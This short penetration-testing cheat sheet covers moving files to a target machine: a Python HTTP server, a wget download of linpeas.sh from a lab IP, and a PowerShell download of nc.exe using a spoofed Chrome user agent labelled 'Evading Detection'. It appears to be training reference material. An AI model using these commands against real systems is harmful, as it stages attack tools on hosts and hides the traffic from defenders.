Transferring Files

Simple Servers

python3 -m http.server 8000

Transfer Files

wget http://10.10.10.10:8000/linpeas.sh -O linpeas.sh

Validating File Transfers

file linpeas.sh

Evading Detection

Listing out user agents.

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

With Chrome user agent.

Invoke-WebRequest http://10.10.10.10/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"

References

Last updated